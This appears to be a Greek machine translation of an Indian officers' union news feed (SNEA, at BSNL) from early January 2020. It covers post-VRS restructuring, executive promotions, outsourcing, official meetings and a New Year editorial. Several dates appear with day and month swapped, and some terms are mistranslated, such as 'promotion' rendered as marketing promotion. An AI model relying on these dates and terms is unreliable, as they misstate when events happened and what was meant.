Κατανομή έργων USOF στην BSNL βάσει υποψηφιοτήτων: Αξιολογήσαμε το CMD BSNL σχετικά με την κατανομή των έργων USOF στην BSNL βάσει υποψηφιοτήτων. Η CMD BSNL ανέφερε ότι πρέπει να κάνουμε όλο το Govt. Έργα/ Έργα USOF και οι επιδόσεις μας κατά τα προηγούμενα χρόνια ήταν πολύ καλές και έχουμε ολοκληρώσει το Govt. Έργα εντός χρονικού πλαισίου. Ωστόσο, πιστεύουμε ότι εάν δοθεί βάσει υποψηφιοτήτων, θα είναι καλό για την BSNL, διαφορετικά εάν ανταγωνιστούμε μέσω διαγωνισμού, μπορεί να μην είναι επωφελές για την BSNL.
Συντήρηση Κύριων Καλωδίων: Εκτιμήσαμε περαιτέρω την CMD σχετικά με τις δυσκολίες που αντιμετωπίζουν τα Στελέχη και οι διάφοροι Κύκλοι στο σενάριο Post-VRS στη συντήρηση των Κύριων Καλωδίων, καθώς οι εντολές συντήρησης του Πρωτεύοντος Καλωδίου για εξωτερική ανάθεση δεν έχουν εκδοθεί από το Εταιρικό Γραφείο. Η CMD BSNL ανέφερε ότι λόγω των αναπτυξιακών εργασιών που πραγματοποιούνται σε διάφορες Πολιτείες, το Πρωτεύον Καλώδιο πρέπει να αντικαθίσταται/συντηρείται συχνά, λαμβάνοντας την άδεια από διάφορες τοπικές αρχές. Φορείς/Αρχές Αυτοκινητοδρόμων για τις οποίες ο Διαγωνιζόμενος ενδέχεται να μην εμφανιστεί και οι εργασίες συντήρησης μας θα υποστούν άσχημα.
Συντήρηση MDF:Παρακαλέσαμε το CMD BSNL ότι ο έλεγχος του MDF πρέπει να είναι εντός του Προσωπικού του BSNL. Η CMD BSNL ανέφερε ότι το νέο μας προσωπικό πρέπει να εμφανιστεί, να αρπάξει τα σημαντικά έργα και να αναλάβει την ευθύνη. Η CMD ανέφερε περαιτέρω ότι λόγω έλλειψης προσωπικού στο σενάριο μετά το VRS, ενδέχεται να μην είναι δυνατή η συντήρηση του MDF όλο το εικοσιτετράωρο από το Προσωπικό της BSNL. Μετά από λεπτομερή συζήτηση, η CMD διαβεβαιώνει ότι θα επανεξετάσει την κατάσταση μετά από τρεις μήνες.
08-01-2020
08-01-2020
Ο ΣΝΕΑ εκφράζει αλληλεγγύη και ηθική συμπαράσταση στη Γενική Απεργία των Κεντρικών Συνδικάτων της 01/08/2020 κατά των Ιδιωτικοποιήσεων του Δημόσιου Τομέα και άλλων αιτημάτων
07-01-2020
07-01-2020
Η συνεδρίαση της Εκτελεστικής Επιτροπής του Κύκλου του Assam Circle πραγματοποιήθηκε στο Guwahati την 01/04/2020. Ο GS και η Jt Sec(East) μίλησαν στην εκτεταμένη συνεδρίαση της CEC. Οι ηγέτες του CHQ θυμήθηκαν τη συμβολή των ανώτερων ηγετών και οι ακτιβιστές που πήραν το VRS. Οδηγούν τον Σύλλογο σε διάφορους αγώνες για διευθέτηση διαφορετικών αιτημάτων και η προσφορά τους θα μείνει αξέχαστη. Όλες οι οφειλές θα εξοφληθούν έως τις 31.01.2020 και ο χωρισμός τους με την BSNL θα είναι ομαλή.
Τελικά ο αγώνας μας για χρόνια μαζί έφερε καλά αποτελέσματα για το BSNL. Η Διοίκηση και η Κυβέρνηση προσπάθησαν να καταστείλουν τον αγώνα μας με πολλά μέσα, με περικοπές μισθών, χρεώσεις, προκηρύξεις αιτιών κ.λπ., αλλά ποτέ δεν συμβιβάσαμε. Τελικά ο αγώνας μας έφερε το φάσμα 4G χωρίς κόστος όπως απαιτούσαμε, εγκρίθηκε η νομισματοποίηση της γης, ολόκληρη η δαπάνη του VRS που βαρύνει το Δημόσιο, ομόλογο 8500 Cr με κρατική εγγύηση εγκεκριμένη για παροχή οικονομικής υποστήριξης κ.λπ.
Η κύρια εστίασή μας είναι στην αναβίωση του BSNL. Η κυκλοφορία του 4G έχει προγραμματιστεί για τις 03/01/2020. Το τιμολόγιο αυξάνεται, κάτι που είναι καλό σημάδι για τη βιομηχανία και την BSNL. Εάν η διοίκηση είναι σε θέση να εφαρμόσει έναν καλό μηχανισμό λαμβάνοντας την εμπιστοσύνη των εργαζομένων, το Revival είναι πολύ πιθανό. Όλα εξαρτώνται από τη διαχείριση.
Σε εταιρικό επίπεδο, η αναδιάρθρωση της BSNL βρίσκεται σε εξέλιξη. Στο αλλαγμένο σενάριο, εκδίδονται οδηγίες για την εξωτερική ανάθεση εργασιών CFA. Ωστόσο, φοβόμαστε ότι λόγω των αυστηρών συνθηκών, μπορεί να αποτύχει σε πολλά σημεία και η BSNL θα έχει μεγάλο πρόβλημα στη συντήρηση των υπηρεσιών μετά τις 01/02/2020, ενημερώσαμε τη διοίκηση. Οι έμπειροι εργάτες ενδέχεται να μην μπορούν να συμμετάσχουν στον διαγωνισμό. Παρόμοιες εργασίες γίνονται και σε άλλους κλάδους.
Όπως φοβόμαστε, στην HR vertical, ο αριθμός των θέσεων μειώνεται δραστικά με την αναδιάρθρωση. Το VRS έριξε διάφορες προκλήσεις και μια από αυτές είναι η μείωση και η προώθηση μετά. Η απειλή της μείωσης των θέσεων υπήρχε για πολλά χρόνια και εν όψει αυτού, ο Σύνδεσμος επεξεργάστηκε μια πολιτική προώθησης που δεν βασιζόταν σε θέσεις πολύ εκ των προτέρων. Τώρα όλη μας η εστίαση είναι στην έγκαιρη εφαρμογή του κατά την ημερομηνία λήξης της 01/07/2018.
Δυστυχώς, κάποιο Executive Assn εξακολουθεί να απαιτεί αναρτήσεις προώθηση από μελλοντική ημερομηνία(για λίγες κενές θέσεις) και βοηθώντας τη διοίκηση να σταματήσει την εφαρμογή της νέας πολιτικής προώθησης. Η Διοίκηση δεν δίνει προαγωγές βάσει ταχυδρομείων στο όνομα της περιφρόνησης και της αναδιάρθρωσης και ταυτόχρονα δεν εφαρμόζει τη νέα πολιτική. Όλοι είναι επιλέξιμοι για προώθηση από την ίδια την 01/07/18, αλλά επιμένουν για προώθηση από μια μελλοντική ημερομηνία! Η ευκαιρία που είχαμε πέρυσι για προώθηση SDE για όλες τις θέσεις SDE που χάλασαν από την ανένδοτη στάση σχετικά με την αναφορά περιφρόνησης και την απαίτηση για προσωπική εμφάνιση των CMD και GM(Pers) στο CAT/Ernakulam.
Η νέα προαγωγή θα ωφελήσει όλα τα στελέχη, διασφαλίζοντας την ομαλή εξέλιξη της σταδιοδρομίας μέχρι τον βαθμό AGM. Όλες οι JTO έως το 2014 μπορούν να γίνουν SDE και όλες οι SDE έως το 2016 μπορούν να γίνουν Sr SDE/Sr AO ή AGM/CAO από τώρα. Το βάρος προϋπηρεσίας παρέχεται στη νέα πολιτική. Έτσι, η προαγωγή από SDE/AO σε Sr SDE/Sr AO Grade θα γίνει σε 3 χρόνια και SDE/AO σε AGM/CAO προαγωγή σε 8 χρόνια, κάτι που δεν μπορεί να φανταστεί κανείς στο αλλαγμένο σενάριο. Μετά το VRS, ο αριθμός των θέσεων σε όλα τα στελέχη θα μειωθεί δραστικά.
Με συνεχή αγώνα και συνεχή πειθώ, θα μπορούσαμε να διευθετήσουμε πολλά ζητήματα στο παρελθόν. Το 2018 θα μπορούσαμε να δώσουμε ρεκόρ προσφορών, που δεν έχουν ακουστεί ποτέ στην ιστορία του BSNL ή του DoT. Θα μπορούσαν να διευθετηθούν συγκεκριμένα ζητήματα των εργαζομένων απευθείας στο BSNL, όπως i) η συνεισφορά του EPF χωρίς ανώτατο όριο, ii) το επίδομα συνταξιοδότησης 5% κ.λπ. Θα συνεχίσουμε τις προσπάθειές μας για την επίλυση των υπολοίπων ζητημάτων με την υποστήριξη όλων.
06-01-2020
Η συνεδρίαση της Εκτελεστικής Επιτροπής του Κύκλου του Assam Circle πραγματοποιήθηκε στο Guwahati την 01/04/2020. Ο GS και η Jt Sec(East) παρευρέθηκαν και μίλησαν στη συνάντηση. Η CEC ομόφωνα εξέλεξε τους ακόλουθους φορείς του Γραφείου Κύκλου:
Πρόεδρος Κύκλου: Com Suresh Bora, AGM.
Γραμματέας Κύκλου: Com Borun Baruah, JTO.
Ταμίας: Com Allauddin Ahmed, AO.
Η συνεργασία έγινε απαραίτητη καθώς οι προηγούμενοι OB επέλεξαν το VRS 2019. Η SNEA αναγνωρίζει τη συμβολή τους για πολλά χρόνια και τους εύχεται ό,τι καλύτερο.
Η SNEA CHQ εύχεται καλή επιτυχία στη νεοεκλεγείσα ομάδα νέων.
03-01-2020
Προβολή αναφορών πολυμέσων:
Η ελεγχόμενη από το κράτος Bharat Sanchar Nigam Limited (BSNL) συνεχίζει να βρίσκεται σε έξαρση μετά από γραφειοκρατικές αβεβαιότητες που οδηγούν σε διάβρωση των πιθανών ευκαιριών εσόδων λόγω των μεγάλων προγραμμάτων συνδεσιμότητας 20.000 crore Rs, παρά την ώθηση του Κέντρου να αναζωογονήσει την αγχωμένη τηλεπικοινωνία .
03-01-2020
03-01-2020
Αλληλεπίδραση με τον Σύμβουλο M/s Deloitte:
Η διοίκηση της BSNL κανόνισε μια συνάντηση με τον Σύμβουλο M/s Deloitte που διορίστηκε για να δώσει συστάσεις σχετικά με τη συνέχεια στις υπηρεσίες BSNL στο σενάριο VRS θέσεων και τα βραχυπρόθεσμα μέτρα την 01/02/2020.
Ο GS, ο Πρόεδρος και οι δύο AGS έκαναν μια λεπτομερή συζήτηση με τον σύμβουλο για περίπου δύο ώρες από τις 16:00 έως τις 18:00, εστιάζοντας σε όλα τα ζητήματα που μπορεί να προκύψουν στο σενάριο μετά το VRS. Ο σύμβουλος εντόπισε οξεία έλλειψη σε στελέχη DGM, AGM και TT(TM) που θα έχουν αντίκτυπο μετά το VRS.
Οι συζητήσεις επικεντρώθηκαν στην επίγεια πραγματικότητα στις μονάδες πεδίου, πώς θα επηρεάσει μετά το VRS, άμεσα μέτρα που πρέπει να ληφθούν για τη μείωση του αντίκτυπου, σχέση με τον πελάτη στο σενάριο μετά το VRS, συγχώνευση SSA και Circle, μειονέκτημα της σημερινής δομής BA, ανθρώπινο δυναμικό απαίτηση, κίνητρο του προσωπικού κ.λπ.
02-01-2020
02-01-2020
Ο GS, ο Πρόεδρος και οι AGS συναντήθηκαν με Γραμματέα/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT και άλλους ανώτερους αξιωματούχους του DoT την 01/01/2020 , το νέο έτος και σύντομες συζητήσεις. Οι συζητήσεις με την CMD και την DIR(HR) για σημαντικά ζητήματα όπως η αναδιάρθρωση και η προώθηση ορίζονται για την επόμενη εβδομάδα λόγω του φορτωμένου προγράμματός τους.
Κατά τη συνάντηση με τον Γραμματέα/DoT θέσαμε το θέμα της προώθησης του DGM(T), το οποίο διακόπτεται λόγω της απάντησης που δόθηκε από τον Γραμματέα/DoT στη συνάντηση με την Κοινοβουλευτική Επιτροπή ότι η προώθηση του DGM μπορεί να εκδοθεί μόνο μετά την ολοκλήρωση της αναδιάρθρωσης (δηλ. μετά το VRS). Εξηγήσαμε ότι όλες οι επιλέξιμες DE λαμβάνουν προαγωγή και δεν υπάρχει καμία κράτηση για την προώθηση DE σε DGM και ότι και οι 287 DE ανήκουν στην κατηγορία SC/ST που επίσης καλύπτονται. Μεταξύ των DE, περισσότερες από 500 DE υπέβαλαν αίτηση για VRS και θα χάσουν την προσφορά εάν εκδοθεί μετά την 31/01/2020. Περαιτέρω γνωστοποιούμε ότι στις 30/12/2019, ακόμη και οι βαθμοφόροι του CGM που συνταξιοδοτούνται στις 31/12/2019 προάγονται και επιτρέπεται να επωφεληθούν της προαγωγής. Αλλά στην περίπτωση των BSNL Executives απλώς αντιστράφηκε.
Μετά από συζήτηση, ο Γραμματέας ενημέρωσε ότι συμφωνεί με την προώθηση του DGM υπό τον όρο: 1) να μην έχει οικονομικές επιπτώσεις λίγο πριν από το VRS και 2) να δενδημιουργήστε οποιοδήποτε θέμα σε παρόμοια πλαίσια. Εξηγήσαμε ότι δεν έχει οικονομικές επιπτώσεις και όλα εργάζονται σε υψηλότερες κλίμακες και δεν θα δημιουργήσει κανένα πρόβλημα σε παρόμοια στελέχη, καθώς η προαγωγή του DGM αναστέλλεται μετά το 2017 λόγω δικαστικών διαφορών.
Στη συνέχεια, ο Γραμματέας μας διαβεβαίωσε ότι θα συζητήσουμε με την CMD και εάν οι πληροφορίες είναι σωστές, θα δώσει άδεια για την προώθηση του DGM.
01-01-2020
01-01-2020
σύνταξης
2019: Ταραγμένη περίοδος στην ιστορία του BSNL. Το ξεπερνάμε επιτυχώς με πρωτοφανή Ενότητα και Αλληλεγγύη
Το νέο έτος ξεδιπλώνει νέες ελπίδες με νέες προκλήσεις
Το 2019, είχαμε περάσει ταραχώδεις στιγμές, που δεν γίναμε ποτέ μάρτυρες στην ιστορία της BSNL με αναταραχές η μία μετά την άλλη απαιτητική Αναβίωση του BSNL. Ήταν πραγματικά μια μάχη για τους υπαλλήλους της BSNL. Κάθε αφοσιωμένο μέλος του SNEA αφιέρωσε έναν ολόκληρο χρόνο για την Αναβίωση του BSNL, καθώς κάθε στέλεχος της BSNL που είχε σωστή σκέψη γνώριζε το γεγονός ότι το μέλλον του εξαρτάται πλήρως από το μέλλον της BSNL. Δυστυχώς κατά τη διάρκεια αυτής της κρίσιμης περιόδου και κάποιο τμήμα των εργαζομένων, ειδικά ορισμένα στελέχη που κρατήθηκαν μακριά από τους κυρίαρχους αγώνες, σαν να μην έχει καμία σχέση η κατάρρευση της BSNL. Πρέπει να συνειδητοποιήσουν τα λάθη και να ενταχθούν στο mainstream, διαφορετικά τα στελέχη πρέπει να δεχτούν την έκκληση να ενισχύσουν το mainstream, αφήνοντας αυτές τις αρνητικές δυνάμεις.
Ναι, είχαμε γίνει μάρτυρες κατασταλτικών μέτρων που εξαπέλυσαν η διοίκηση και η κυβέρνηση εναντίον των Ενώσεων και των Συνδικάτων για να τους αναγκάσουν να σταματήσουν τις ταραχές και τους αγώνες, επιτρέποντας στο BSNL για τον φυσικό του θάνατο αποδεχόμενοι την ήττα. Αλλά ποτέ δεν υποχωρήσαμε καθώς ήμασταν φτιαγμένοι από διαφορετικά πράγματα, έτοιμοι για οποιαδήποτε θυσία και έτοιμοι να παλέψουμε μέχρι το τέλος, μέχρι να πετύχουμε τον στόχο μας. Ναι, ήταν μια μάχη do or die για όλους μας την οποία πρέπει να κερδίσουμε με οποιοδήποτε κόστος.
Αρχικά, η κυβέρνηση δεν ήταν καθόλου σοβαρή για το Revival of BSNL. Όλα τα Υπουργεία ήταν αντίθετα με το Σχέδιο Αναβίωσης. Η κυβέρνηση περίμενε τον φυσικό θάνατο του BSNL. Το Υπουργείο Οικονομικών ήταν τόσο εχθρικό, αντιτάχθηκε σε κάθε είδους πακέτο Revival και επέμενε για το κλείσιμο των BSNL και MTNL. Ο αγώνας, δίπλα-δίπλα με τις επιτυχημένες προσπάθειες των εργαζομένων της BSNL να δημιουργήσουν γνώμη του κοινού και των μέσων ενημέρωσης υπέρ του BSNL Revival έκανε πραγματικά θαύματα. Ο SNEA πρωτοστατούσε σε όλες αυτές τις δραστηριότητες. Ο εξαναγκασμός που δημιουργήσαμε για πολιτική παρέμβαση τελικά λειτούργησε. Οι ειλικρινείς προσπάθειες του Hon MoC και οι προσπάθειές του να σχηματίσει το GoM με Πρόεδρο τον Υπουργό Εσωτερικών σε συνδυασμό με τις ειλικρινείς προσπάθειες και των δύο Γραμματέων/DoT και των δύο CMD/BSNL έκαναν τα πράγματα να συμβούν. Οι προσπάθειές μας για την παρέμβαση του αξιότιμου πρωθυπουργού και η τελική έκκληση του ίδιου του αξιότιμου πρωθυπουργού να δώσουμε ένα καλό πακέτο Revival που θα βοηθήσει πραγματικά στην αναβίωση του BSNL ήταν ο πιο καθοριστικός παράγοντας.
Τελικά το πακέτο αναβίωσης BSNL και MTNL εγκρίθηκε από το Υπουργικό Συμβούλιο της Ένωσης στις 23/10/2019, δίνοντας νέα πνοή στην BSNL και την MTNL. Το πακέτο έχει τις πραγματικές δυνατότητες για την αναβίωση του BSNL. Οι χρεώσεις φάσματος 4G ύψους 14.155 Crores συν 18% GST θα βαρύνουν την κυβέρνηση, όπως απαιτείται από εμάς. Από την αρχή, η AUAB απαίτησε από την κυβέρνηση να εκχωρήσει δωρεάν φάσματα 4G στην BSNL. Η δημιουργία εσόδων γης για την εκκαθάριση των υποχρεώσεων και την εκπλήρωση του CAPEX έλαβε επίσης την έγκριση του Υπουργικού Συμβουλίου. Το αίτημά μας για οικονομική βοήθεια υλοποιήθηκε επίσης με τη μορφή μακροπρόθεσμου ομολόγου 10 ετών για 15.000 Cr για BSNL και MTNL με κρατική εγγύηση. Η ανησυχία μας για συγχώνευση της MTNL με την BSNL, δηλ. Η τεράστια χρηματοοικονομική υποχρέωση, η ιδιότητά της ως εισηγμένης εταιρείας και τα περίπλοκα ζητήματα ανθρώπινου δυναμικού, αντιμετωπίζονται πριν από τη συγχώνευση. Ολόκληρη η ευθύνη των περίπου 15.000 Crores για το VRS βαρύνει την κυβέρνηση, καθώς ήμασταν αντίθετοι σε οποιαδήποτε πρόσθετη οικονομική επιβάρυνση για την BSNL στο όνομα της VRS. Η κατανομή του φάσματος 5G είναι μια άλλη αγαπημένη απόφαση στο μέλλον.
Κάθε υπάλληλος του BSNL, ειδικά οι Σύντροφοι του SNEA μπορούν να αγαπήσουν αυτό το θαυμάσιο επίτευγμα, δημιουργώντας μια άλλη ιστορία στο συνδικαλιστικό κίνημα. Ναι σύντροφοι, δημιουργήσαμε ιστορία παλεύοντας ώμο με ώμο με άλλους εργαζόμενους, για την Αναβίωση της εταιρείας, δίνοντας παράδειγμα για άλλους τομείς. Είμαι πολύ περήφανος και τυχερός που είμαι μέρος ενός τέτοιου αγώνα και ηγούμαι ενός Συλλόγου αφοσιωμένων μελών πρωτοστατώντας στον αγώνα στο λάβαρο της AUAB, στην πιο δύσκολη περίοδο. Αυτές είναι οι αξέχαστες στιγμές στη ζωή.
Τώρα, βρισκόμαστε στα κατώφλια του 2020 με πολλές ελπίδες και προσδοκίες. Αναζητούμε θετικότητα στο BSNL. Το BSNL revival είναι το πρώτο μεταξύ αυτών.
Η εκτόξευση 4G σε παν Ινδία βάση στο εκχωρημένο φάσμα δεν θα πρέπει να καθυστερήσει. Οι πελάτες περιμένουν με ανυπομονησία εκείνη τη στιγμή. Ομοίως, η BSNL είναι υπόλογη στην κυβέρνηση και μετά την κατανομή του δωρεάν φάσματος 4G. Ο εκσυγχρονισμός του δικτύου πρέπει να επισπευσθεί. Τα λειτουργικά ζητήματα και η εκκαθάριση των εκκρεμών οφειλών προς τους εργάτες, τους εργολάβους, τους πωλητές, τους ιδιοκτήτες γης κ.λπ. είναι οι άμεσες προκλήσεις για να καταστεί επιτυχημένο οποιοδήποτε μοντέλο εξωτερικής ανάθεσης. Η BSNL πρέπει να ανακτήσει την εμπιστοσύνη μεταξύ τους εκκαθαρίζοντας τις οφειλές τους που θα ανοίξουν ο δρόμοςγια το μέλλον. Η αξιοποίηση των χρημάτων μέσω των κρατικών ομολόγων και της νομισματοποίησης της γης είναι δύο σημαντικά μέτρα προς αυτή την κατεύθυνση. Η διοίκηση πρέπει να βγει από το σύνδρομο VRS και να αρχίσει να εργάζεται για αυτά τα ζητήματα για να διασφαλίσει ότι η BSNL θα συνεχίσει να παρέχει αδιάλειπτες υπηρεσίες μετά την 31/01/2020. Μεγάλος αριθμός πιστών πελατών ανησυχεί πραγματικά για τη μαζική οικειοθελή αποχώρηση και είναι δική μας ευθύνη να ανακτήσουμε την εμπιστοσύνη τους στο σενάριο μετά το VRS. Από αυτή την άποψη, οι αποφάσεις διαχείρισης θα είναι πολύ κρίσιμες.
Εκτός από τα παραπάνω ζητήματα, ο τρόπος με τον οποίο η διοίκηση θα παρακινήσει τους υπόλοιπους 47% υπαλλήλους να αναλάβουν ολόκληρο τον φόρτο εργασίας στην κατάσταση μετά το VRS, πώς γεμίζουν το κενό που δημιουργείται στις μονάδες πεδίου που παράγει έσοδα κ.λπ. αντίκτυπο στις προσπάθειες για την αναβίωση του BSNL. Η έλλειψη στελεχών σε υψηλότερο επίπεδο μπορεί εύκολα να καλυφθεί με προαγωγή που μπορεί να γίνει εντός δύο ημερών από τη νέα πολιτική, απλά με τη λήψη VC.
Δεν μπορούν να προβληθούν άλλες δικαιολογίες από τη διοίκηση DoT/Government και BSNL στο όνομα του κόστους των εργαζομένων, καθώς πάνω από το 50% των εργαζομένων έλαβαν VRS, υπερβαίνοντας τον στόχο τους. Έχουμε ήδη προειδοποιήσει τη διοίκηση ότι η αντιεπαγγελματική και δραστική μείωση της δύναμης των στελεχών θα έχει αρνητικό αντίκτυπο στην αναβίωση του BSNL και ότι οι καλοί εργαζόμενοι θα παραμείνουν στο BSNL. Όλα εξαρτώνται από το πώς η διοίκηση χρησιμοποιεί τους εναπομείναντες υπαλλήλους επικερδώς στο σενάριο μετά το VRS. Μια επαγγελματική προσέγγιση και γρήγορες αποφάσεις πολιτικής μπορούν για άλλη μια φορά να επαναφέρουν την BSNL σε τροχιά.
Ας ελπίσουμε ότι το 2020 θα φέρει καλά νέα για το BSNL και ολόκληρο το έθνος.